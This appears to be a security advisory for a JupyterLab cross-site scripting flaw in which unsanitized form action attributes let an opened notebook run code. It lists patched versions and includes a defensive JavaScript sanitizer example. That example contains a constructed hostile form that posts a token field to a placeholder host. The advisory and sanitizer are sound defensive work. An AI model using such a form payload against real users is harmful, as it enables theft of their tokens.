OSV: GHSA-4952-P58Q-6CRX
History: Aug 23, 2021 - 7:40 p.m.

JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>

Source: Google (osv.dev)
Tags: jupyterlab, xss, form sanitization, remote code execution, patch, owasp, security advisory, guillaume jeanne

EPSS

0.004

Percentile

73.0%

Impact

An untrusted notebook can execute code when it is loaded. This is remote code execution, but it requires user action: the victim has to open the notebook.
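As an added illustration of the defensive side of the flaw named in this advisory's title (example code written for this page, not code from JupyterLab or from the advisory): a filter that strips `action` and `formaction` attributes from untrusted HTML before it is rendered and reports what it removed, so a renderer can refuse to let notebook-supplied markup choose a form submission target. The tag/attribute scanner, the sample markup and the `untrusted.example` host are constructed for this example; a real deployment would rely on a maintained HTML sanitizer plus a `form-action` Content-Security-Policy directive, in the spirit of the OWASP reference listed below.

```javascript
// Added example, not JupyterLab's own code: strip form-submission targets
// from untrusted HTML before it is rendered.
// Assumption: a small regex-based tag/attribute scanner is enough to show
// the idea; production code should use a maintained sanitizer (e.g. DOMPurify)
// and a Content-Security-Policy with `form-action 'self'` as defence in depth.

// Attributes that decide where a form submission goes.
const FORM_SUBMISSION_ATTRS = new Set(["action", "formaction"]);

// One opening or self-closing tag: name, raw attribute text, optional "/".
const TAG_RE =
  /<([a-zA-Z][\w:-]*)((?:\s+[^\s"'<>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?)*)\s*(\/?)>/g;

// One attribute inside a tag: name and a double-, single- or un-quoted value.
const ATTR_RE =
  /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

/**
 * Remove `action` and `formaction` attributes from every element in `html`,
 * whatever the element (they only matter on form/input/button, but dropping
 * them everywhere keeps the rule simple). Returns the cleaned markup and a
 * list of what was removed so the caller can log it or show it to the user.
 */
function stripFormSubmissionAttrs(html) {
  const removed = [];
  const cleaned = html.replace(TAG_RE, (whole, tag, attrs, selfClose) => {
    const kept = [];
    for (const m of attrs.matchAll(ATTR_RE)) {
      const name = m[1].toLowerCase();
      if (FORM_SUBMISSION_ATTRS.has(name)) {
        removed.push({
          tag: tag.toLowerCase(),
          attr: name,
          value: m[2] ?? m[3] ?? m[4] ?? "",
        });
      } else {
        kept.push(m[0]); // keep the attribute exactly as written
      }
    }
    const attrText = kept.map((a) => " " + a).join("");
    return `<${tag}${attrText}${selfClose ? " /" : ""}>`;
  });
  return { html: cleaned, removed };
}

// Constructed sample of untrusted, notebook-style HTML output (not taken from
// the advisory); the host name is a placeholder.
const SAMPLE_UNTRUSTED_HTML =
  '<div class="output"><form action="https://untrusted.example/collect" method="post">' +
  "<input name=\"token\" formaction='//untrusted.example'>" +
  '<button type="submit">Submit</button></form></div>';

const result = stripFormSubmissionAttrs(SAMPLE_UNTRUSTED_HTML);
console.log(result.html);
console.log("removed:", result.removed);
```

The `removed` list is the part worth keeping around: in a renderer it is the signal to log, to warn the user that the notebook tried to set a submission target, or to refuse to render the cell at all rather than silently cleaning it.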

Patches

Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.

References

OWASP Page on Restricting Form Submissions

For more information

If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [email protected].

Credit: Guillaume Jeanne from Google
